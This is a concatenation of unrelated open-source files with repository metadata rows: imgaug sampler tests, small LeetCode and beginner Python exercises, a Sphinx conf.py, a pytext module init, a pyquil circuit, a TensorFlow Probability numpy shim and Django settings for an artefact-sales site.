assert len(list(seen.keys())) == 2
assert np.all(seen.values())
def test_n_points_can_vary_between_images(self):
sampler = iaa.UniformPointsSampler(iap.Choice([1, 10]))
images = [
np.zeros((10, 10, 1), dtype=np.uint8)
for _ in sm.xrange(50)]
points = sampler.sample_points(images, 1)
point_counts = set([len(points_i) for points_i in points])
assert len(points) == 50
assert len(list(point_counts)) == 2
assert 1 in point_counts
assert 10 in point_counts
def test_determinism(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
sampler = iaa.UniformPointsSampler(100)
observed_s1_1 = sampler.sample_points([image], 1)[0]
observed_s1_2 = sampler.sample_points([image], 1)[0]
observed_s2_1 = sampler.sample_points([image], 2)[0]
assert np.allclose(observed_s1_1, observed_s1_2)
assert not np.allclose(observed_s1_1, observed_s2_1)
def test_conversion_to_string(self):
sampler = iaa.UniformPointsSampler(10)
expected = "UniformPointsSampler(Deterministic(int 10))"
assert sampler.__str__() == sampler.__repr__() == expected
class TestSubsamplingPointSampler(unittest.TestCase):
def setUp(self):
reseed()
def test___init__(self):
other = iaa.RegularGridPointsSampler(1, 1)
sampler = iaa.SubsamplingPointsSampler(other, 100)
assert sampler.other_points_sampler is other
assert sampler.n_points_max == 100
def test_max_is_zero(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
other = iaa.RegularGridPointsSampler(2, 2)
with warnings.catch_warnings(record=True) as caught_warnings:
sampler = iaa.SubsamplingPointsSampler(other, 0)
observed = sampler.sample_points([image], 1)[0]
assert len(observed) == 0
assert len(caught_warnings) == 1
assert "n_points_max=0" in str(caught_warnings[-1].message)
def test_max_is_above_point_count(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
other = iaa.RegularGridPointsSampler(2, 2)
sampler = iaa.SubsamplingPointsSampler(other, 100)
observed = sampler.sample_points([image], 1)[0]
assert len(observed) == 4
assert np.allclose(observed, [
[0.0, 0.0],
[10.0, 0.0],
[0.0, 10.0],
[10.0, 10.0]
])
def test_max_is_below_point_count(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
other = iaa.RegularGridPointsSampler(5, 5)
sampler = iaa.SubsamplingPointsSampler(other, 1000)
observed = sampler.sample_points([image], 1)[0]
assert len(observed) == 5*5
def test_max_is_sometimes_below_point_count(self):
image = np.zeros((1, 10, 3), dtype=np.uint8)
other = iaa.RegularGridPointsSampler(1, (9, 11))
sampler = iaa.SubsamplingPointsSampler(other, 1000)
observed = sampler.sample_points([image] * 100, 1)
counts = [len(observed_i) for observed_i in observed]
counts_uq = set(counts)
assert 9 in counts_uq
assert 10 in counts_uq
assert 11 not in counts_uq
def test_random_state_propagates(self):
image = np.zeros((1, 1, 3), dtype=np.uint8)
points = np.linspace(0.0+0.9, 1000.0-0.9, num=1)
points = np.stack([points, points], axis=-1)
other = _FixedPointsSampler(points)
sampler = iaa.SubsamplingPointsSampler(other, 100)
_ = sampler.sample_points([image], 1)[0]
rs_s1_1 = other.last_random_state
_ = sampler.sample_points([image], 1)[0]
rs_s1_2 = other.last_random_state
_ = sampler.sample_points([image], 2)[0]
rs_s2_1 = other.last_random_state
assert rs_s1_1.equals(rs_s1_2)
assert not rs_s1_1.equals(rs_s2_1)
def test_conversion_to_string(self):
sampler = iaa.SubsamplingPointsSampler(
iaa.RegularGridPointsSampler(10, 20),
10
)
expected = (
"SubsamplingPointsSampler("
"RegularGridPointsSampler("
"Deterministic(int 10), "
"Deterministic(int 20)"
"), "
"10"
")"
)
assert sampler.__str__() == sampler.__repr__() == expected
| [
"kontakt@ajung.name"
] | kontakt@ajung.name |
4ed63a194e46e6ec0133622fac16fb04d230513d | 0b8eefbd29abda41cbe3725621a208c90aa9b6f0 | /Problemset/relative-sort-array/relative-sort-array.py | 01d5a054220ddad076f0d6e990023dee45ace2e1 | [
"MIT"
] | permissive | KivenCkl/LeetCode | bf2d86c6d0a4a3cd136ed3ce74b3561ca26f510d | fcc97c66f8154a5d20c2aca86120cb37b9d2d83d | refs/heads/master | 2021-07-07T12:57:28.252071 | 2020-09-13T05:19:13 | 2020-09-13T05:19:13 | 185,034,499 | 8 | 7 | null | null | null | null | UTF-8 | Python | false | false | 620 | py |
# @Title: 数组的相对排序 (Relative Sort Array)
# @Author: KivenC
# @Date: 2019-07-18 14:56:57
# @Runtime: 48 ms
# @Memory: 13.1 MB
class Solution:
def relativeSortArray(self, arr1: List[int], arr2: List[int]) -> List[int]:
# 统计 arr1 中的元素,按照 arr2 相对顺序填放,剩下的元素按照升序放置
import collections
counter = collections.Counter(arr1)
res = []
for a in arr2:
res.extend([a] * counter[a])
del counter[a]
for k in sorted(counter.keys()):
res.extend([k] * counter[k])
return res
| [
"chen941229@126.com"
] | chen941229@126.com |
4c2040871eb316dfbdd91a29953777fda947cfbb | 360e1f69f4c0923c5d79bc82aa33c0fd4e80b71e | /RECURSION/Reverse_a_string_recurssion.py | 53056e1653e7608aa8159a683d5cf2066771dbbd | [] | no_license | Vijay1234-coder/data_structure_plmsolving | 04e52fe6c918313e13d39107a2ded8b47645bb12 | d449b266295d1ae55613cdcfd9b22ad9cee3dfbe | refs/heads/master | 2023-08-01T00:55:28.825972 | 2021-09-12T15:20:12 | 2021-09-12T15:20:12 | 387,782,783 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py |
def reverse(s):
if len(s)<= 1:
return s
else:
return reverse(s[1:])+s[0] # 'bc'+'a'
#'c'+'b'+'a'
print(reverse('abc'))
| [
"77201164+Vijay1234-coder@users.noreply.github.com"
] | 77201164+Vijay1234-coder@users.noreply.github.com |
2e6eacc165e2ade818208ef44b1eac4d38c1a04b | a9a90eae727590f0ccffaa255ffeaa194309fbe9 | /Codekata/oddadd.py | f24be72dff28c32c3555a9d6cff21e247eba6288 | [] | no_license | dhanuskarthikeyan/guvi | 18c39674d3ee8e0012caef781d7905e541792174 | 671d64189f6039ffad8d91cab13942aafa87bf29 | refs/heads/master | 2020-06-03T00:07:45.041170 | 2019-07-08T17:39:33 | 2019-07-08T17:39:33 | 191,355,054 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | num,n=(raw_input().split())
num=int(num)
n=int(n)
num=n+num
if(num>=0):
if(num%2==0):
print "even"
else:
print "odd"
else:
print "invalid"
| [
"noreply@github.com"
] | dhanuskarthikeyan.noreply@github.com |
2dd8b2032365c69324b199b0db23e8c64b7655c0 | 603589525a5fc10fd30ae13181c5a730269705a5 | /doc/conf.py | 81222948adae5eaf8a1aa9e5f2776442adc6d70c | [
"MIT"
] | permissive | ibell/pdsim | 0848ac8d2819a67f0dd8acd86b269ff9a6130018 | 2e33166fdbb3b868a196607c3d06de54e429824d | refs/heads/master | 2023-08-31T01:49:44.386884 | 2023-08-29T00:40:21 | 2023-08-29T00:40:28 | 12,456,094 | 36 | 25 | MIT | 2023-08-20T19:24:03 | 2013-08-29T09:09:58 | Python | UTF-8 | Python | false | false | 12,156 | py | # -*- coding: utf-8 -*-
#
# PDModel documentation build configuration file, created by
# sphinx-quickstart on Wed May 02 18:01:14 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os, subprocess
on_rtd = os.getenv('READTHEDOCS') == 'True'
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('sphinxext'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
#sys.path.insert(0,os.path.abspath('..'))
sys.path.append(os.path.abspath('..'))
sys.path.append(os.path.abspath(os.path.join('..','GUI')))
def run_prebuild(_):
# Run sphinx.apidoc programmatically to autogenerate documentation for PDSim
cur_dir = os.path.abspath(os.path.dirname(__file__))
subprocess.check_output(f'sphinx-apidoc -f -o PDSim_apidoc {os.path.dirname(PDSim.__file__)}', shell=True, cwd=cur_dir)
# -- Execute all notebooks --------------------------------------------------
if on_rtd:
for path, dirs, files in os.walk('.'):
for file in files:
if file.endswith('.ipynb') and '.ipynb_checkpoints' not in path:
subprocess.check_output(f'jupyter nbconvert --to notebook --output {file} --execute {file}', shell=True, cwd=path)
def setup(app):
app.connect('builder-inited', run_prebuild)
extensions = ['nbsphinx',
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.intersphinx',
#~ 'sphinx.ext.coverage',
'sphinx.ext.autosummary',
'sphinx.ext.viewcode',
'sphinx.ext.mathjax',
'matplotlib.sphinxext.plot_directive',
'IPython.sphinxext.ipython_console_highlighting',
'IPython.sphinxext.ipython_directive'
]
#autodoc_default_flags = ['members','no-inherited-members','show-inheritance','private-members']
intersphinx_mapping = {'CoolProp': ('http://coolprop.sourceforge.net', None),
'matplotlib':('https://matplotlib.org', None),
'wx': ('http://wxpython.org/Phoenix/docs/html/', None),
'python': ('https://docs.python.org/3/',None),
'numpy':('https://docs.scipy.org/doc/numpy',None)
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'PDSim'
copyright = u'2012, Ian Bell'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
import PDSim
# The short X.Y version.
version = PDSim.__version__
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if on_rtd:
html_theme = 'default'
else:
html_theme = 'nature'
import sphinx_bootstrap_theme
# Activate the theme.
html_theme = 'bootstrap'
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
# Theme options are theme-specific and customize the look and feel of a
# theme further.
html_theme_options = {
# Navigation bar title. (Default: ``project`` value)
'navbar_title': "PDSim",
# Tab name for entire site. (Default: "Site")
'navbar_site_name': "Site",
# A list of tuples containing pages or urls to link to.
# Valid tuples should be in the following forms:
# (name, page) # a link to a page
# (name, "/aa/bb", 1) # a link to an arbitrary relative url
# (name, "http://example.com", True) # arbitrary absolute url
# Note the "1" or "True" value above as the third argument to indicate
# an arbitrary url.
'navbar_links': [
("API", "PDSim_apidoc/PDSim"),
#("Link", "http://example.com", True),
],
# Render the next and previous page links in navbar. (Default: true)
'navbar_sidebarrel': True,
# Render the current pages TOC in the navbar. (Default: true)
'navbar_pagenav': True,
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 2,
# Include hidden TOCs in Site navbar?
#
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
#
# Values: "true" (default) or "false"
'globaltoc_includehidden': "true",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For black navbar, do "navbar navbar-inverse"
'navbar_class': "navbar navbar-inverse",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "true",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "nav",
# Bootswatch (http://bootswatch.com/) theme.
#
# Options are nothing with "" (default) or the name of a valid theme
# such as "amelia" or "cosmo".
'bootswatch_theme': "yeti",
# Choose Bootstrap version.
# Values: "3" (default) or "2" (in quotes)
'bootstrap_version': "3",
}
#~ import sphinx_rtd_theme
#~ html_theme = "sphinx_rtd_theme"
#~ html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
#~ sys.path.append(os.path.abspath('_themes'))
#~ html_theme_path = ['_themes']
#~ html_theme = 'kr'
#~ import sphinx_readable_theme
#~ html_theme_path = [sphinx_readable_theme.get_html_theme_path()]
#~ html_theme = 'readable'
#~ # import Cloud
#~ import cloud_sptheme as csp
#~ # set the html theme
#~ html_theme = "cloud" # NOTE: there is also a red-colored version named "redcloud"
#~ # set the theme path to point to cloud's theme data
#~ html_theme_path = [csp.get_theme_dir()]
#~ # [optional] set some of the options listed above...
#~ html_theme_options = { "roottarget": "index" }
#html_theme = 'Cloud'
#html_theme_path = ['../externals/scipy-sphinx-theme/_theme']
# html_theme_options = {
# "edit_link": "true",
# "sidebar": "right",
# "scipy_org_logo": "false",
# "rootlinks": [("http://scipy.org/", "Scipy.org"),
# ("http://docs.scipy.org/", "Docs")]
# }
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'PDSimdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'PDSim.tex', u'PDModel Documentation',
u'Ian Bell', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pdsim', u'PDSim Documentation',
[u'Ian Bell'], 1)
]
| [
"ian.h.bell@gmail.com"
] | ian.h.bell@gmail.com |
fa07553477e3bb2ecbeb87bd1383a2194282579c | b8eb666c8b6fe4610d87bff8048f4a95a1c5b549 | /测试/UI自动化/测试工具__Selenium/selenium/Phy/元组学习.py | 659d98f549399863fa07b324050146c658ed72dc | [] | no_license | cainiaosun/study | 1e983e404005e537410b205634a27cee974faba0 | 91df9b63cda1839b7fc60de3b5f1eb19ccc33a1f | refs/heads/master | 2020-05-30T09:59:19.749099 | 2019-11-22T10:39:12 | 2019-11-22T10:39:12 | 189,641,828 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,244 | py | #coding=UTF-8
import random
import random
list=[]
s=0
for i in range(1,5):
for j in range(1,5):
for k in range(1,5):
if i!=j and j<>k:
list.append(str(i)+str(j)+str(k))
s=s+1
print len(list)
print s
if len(list)==s:
print "是相等的!"
else:
print "不相等!"
print list[random.randrange(1,len(list))]
import math
for n in range(1,1):
i=math.sqrt(n+100)
print i
j=math.sqrt(n+268)
print j
if i/2.0==int(i/2) and j/2.0==int(j/2):
print n
break
import time
#print help(time.strftime)
print time.strftime("%Y")
list=[90,19,8,99,87,45,109]
list.sort()
print u"sort排序输出:",list
list=[90,19,8,99,87,45,109]
i=len(list)
for b in range(1,i):
i=i-1
for a in range(0,i):
if list[a+1]<list[a]:
temp=list[a+1]
list[a+1]=list[a]
list[a]=temp
print u"冒泡排序输出:",list
print '*'*10
for i in range(5):
print "* *"
print '*'*10
import sys
#sys.stdout.write(chr(1))
temp=0#正常产仔的兔子
temp1=0#剩余一个月产仔的兔子
temp2=1#剩余2个月产仔的兔子
m=12#int(raw_input(u"请输入月份:"))
for i in range(1,m+1):
temp=temp+temp1
temp22=temp2
temp2=temp
temp1=temp22
print "24个月后的兔子数量:",temp+temp1+temp2
f1=1
f2=1
for i in range(1,24):
#print "%12d%12d"%(f1,f1)
if (i%2)==0:
print ''
f1=f1+f2
f2=f1+f2
for i in range(1,10):
for j in range(0,10):
for k in range(0,10):
if i**3+j**3+k**3==int(str(i)+str(j)+str(k)):
print int(str(i)+str(j)+str(k))
import sys
from sys import stdout
n=45
print '数值:n=%d'%n
list=[]
for i in range(2,n+1):
while n!=0:
if n%i==0:
list.append(str(i))
sys.stdout.write(str(i))
sys.stdout.write("*")
n=n/i
else:
break
print "%d"%n
for i in range(0,len(list)):
if i<len(list)-1:
sys.stdout.write(list[i]+"*")
else:
sys.stdout.write(list[i])
h=100
sum=0
for i in range(1,11):
if i==1:
print ''
sum=sum+h
h=h/2.0
sum=sum+2*h
print h
print sum
| [
"1551577567@qq.com"
] | 1551577567@qq.com |
ba376912f0e12d134b662c53c1aadd34496d5a74 | 3a9f63f506172ac2d4a1ca9744fedd8f9b2b1628 | /pytext/data/__init__.py | 0ea8bef648e40c61f8aa137845996fdabce86390 | [
"BSD-3-Clause"
] | permissive | czHP0616/pytext | 4c40a8f3afa48284e2919e54d1b489830a321eed | 64ab1835905dea2e7797e6bc11398c55941fa728 | refs/heads/master | 2020-05-25T09:21:52.394044 | 2019-05-20T21:36:39 | 2019-05-20T21:39:33 | 187,734,243 | 0 | 0 | NOASSERTION | 2019-05-21T00:46:06 | 2019-05-21T00:46:06 | null | UTF-8 | Python | false | false | 1,807 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .batch_sampler import (
BaseBatchSampler,
EvalBatchSampler,
RandomizedBatchSampler,
RoundRobinBatchSampler,
)
from .bptt_lm_data_handler import BPTTLanguageModelDataHandler
from .compositional_data_handler import CompositionalDataHandler
from .contextual_intent_slot_data_handler import ContextualIntentSlotModelDataHandler
from .data import Batcher, Data, PoolingBatcher, generator_iterator
from .data_handler import BatchIterator, CommonMetadata, DataHandler
from .disjoint_multitask_data import DisjointMultitaskData
from .disjoint_multitask_data_handler import DisjointMultitaskDataHandler
from .doc_classification_data_handler import DocClassificationDataHandler, RawData
from .joint_data_handler import JointModelDataHandler
from .language_model_data_handler import LanguageModelDataHandler
from .pair_classification_data_handler import PairClassificationDataHandler
from .query_document_pairwise_ranking_data_handler import (
QueryDocumentPairwiseRankingDataHandler,
)
from .seq_data_handler import SeqModelDataHandler
__all__ = [
"Batcher",
"BaseBatchSampler",
"BatchIterator",
"BPTTLanguageModelDataHandler",
"CommonMetadata",
"CompositionalDataHandler",
"ContextualIntentSlotModelDataHandler",
"Data",
"DataHandler",
"DisjointMultitaskData",
"DisjointMultitaskDataHandler",
"DocClassificationDataHandler",
"EvalBatchSampler",
"generator_iterator",
"JointModelDataHandler",
"LanguageModelDataHandler",
"PairClassificationDataHandler",
"PoolingBatcher",
"RandomizedBatchSampler",
"QueryDocumentPairwiseRankingDataHandler",
"RawData",
"RoundRobinBatchSampler",
"SeqModelDataHandler",
]
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
b9a66d204ad06b3325735e7e16ef709e831b14d2 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R4/benchmark/startPyquil57.py | 4d55af20dcfac3d89ea1bfc7d95f538b60cedb64 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | # qubit number=4
# total number=10
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(0) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += Y(3) # number=5
prog += SWAP(1,0) # number=6
prog += SWAP(1,0) # number=7
prog += SWAP(2,0) # number=8
prog += SWAP(2,0) # number=9
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil57.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
65d874a8d7d0ba1e2d8d09e04d255d0fb375f38d | a84e1a1aac96612b32ba5adcc49a4005c0c5129e | /tensorflow_probability/python/internal/backend/numpy/raw_ops.py | 79f2e95696806a3b0f7425925a0bac61afb756f4 | [
"Apache-2.0"
] | permissive | jedisom/probability | 4fc31473d691d242a3e88c179ae3a9c555a29bb6 | 6791e7ce1c2b0a9057a19a8ea697aeaf796d4da7 | refs/heads/master | 2022-04-23T00:21:46.097126 | 2020-04-22T20:03:04 | 2020-04-22T20:04:59 | 258,031,151 | 1 | 0 | Apache-2.0 | 2020-04-22T22:08:57 | 2020-04-22T22:08:56 | null | UTF-8 | Python | false | false | 1,831 | py | # Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Numpy implementations of TensorFlow general top-level functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
from tensorflow_probability.python.internal.backend.numpy import _utils as utils
__all__ = [
'MatrixDiagPartV2',
]
JAX_MODE = False
def _matrix_diag_part_v2(input, k, padding_value, name=None): # pylint: disable=redefined-builtin,unused-argument
"""Implements tf.raw_ops.MatrixDiagPartV2, for scalar k."""
if np.array(k).ndim > 0:
raise NotImplementedError
shp = np.shape(input)
if JAX_MODE:
if len(shp) > 2:
from jax import vmap # pylint: disable=g-import-not-at-top
return vmap(_matrix_diag_part_v2, (0, None, None))(
input, k, padding_value)
return np.diag(input, k=k)
input = np.reshape(input, (-1, shp[-2], shp[-1]))
output = np.array([np.diag(arr, k=k) for arr in input])
return output.reshape(*(shp[:-2] + output.shape[1:]))
MatrixDiagPartV2 = utils.copy_docstring( # pylint: disable=invalid-name
'tf.raw_ops.MatrixDiagPartV2',
_matrix_diag_part_v2)
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
f541408a9b1aac2d3114dd958181e6ed89be2153 | c08e62724137acebcae7f7badf0176f7f73e64fd | /ecommerce/settings.py | f271e9e79c06df710e99651742f27a7a4a20ed0d | [] | no_license | keefm6776/ij-artefact-sales-site | 91809b8d3c975ea7b681acae62382b2146348611 | 826db92776c77b57a3f6da7727ba5fe9471e6662 | refs/heads/master | 2022-12-08T10:43:06.847267 | 2020-01-13T14:52:26 | 2020-01-13T14:52:26 | 216,651,747 | 0 | 1 | null | 2022-11-22T04:46:49 | 2019-10-21T19:43:42 | Python | UTF-8 | Python | false | false | 4,793 | py | """
Django settings for ecommerce project.
Generated by 'django-admin startproject' using Django 1.11.17.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
#import env
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['localhost', 'ijones-artefact-sales.herokuapp.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_forms_bootstrap',
'accounts',
'artefacts',
'cart',
'checkout',
'customer',
'storages',
'bids',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ecommerce.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
'cart.contexts.cart_contents',
],
},
},
]
WSGI_APPLICATION = 'ecommerce.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/databases
if "DATABASE_URL" in os.environ:
DATABASES = {'default': dj_database_url.parse(
os.environ.get('DATABASE_URL'))}
else:
print("Database URL not found. Using SQLite instead")
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.\
UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.\
MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.\
CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.\
NumericPasswordValidator',
},
]
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend',
'accounts.backends.CaseInsensitiveAuth']
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
AWS_S3_OBJECT_PARAMETERS = {
'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',
'CacheControl': 'max-age=94608000'
}
AWS_STORAGE_BUCKET_NAME = 'ij-artefact-sales'
AWS_S3_REGION_NAME = 'eu-west-1'
AWS_ACCESS_KEY_ID = os.environ.get("AWS_SECRET_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_DEFAULT_ACL = None
AWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME
STATICFILES_LOCATION = 'static'
STATICFILES_STORAGE = 'custom_storages.StaticStorage'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
STATIC_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, STATICFILES_LOCATION)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIAFILES_LOCATION = 'media'
DEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'
MEDIA_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, MEDIAFILES_LOCATION)
STRIPE_PUBLISHABLE = os.getenv('STRIPE_PUBLISHABLE')
STRIPE_SECRET = os.getenv('STRIPE_SECRET')
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
| [
"keefm_6776@yahoo.com"
] | keefm_6776@yahoo.com |
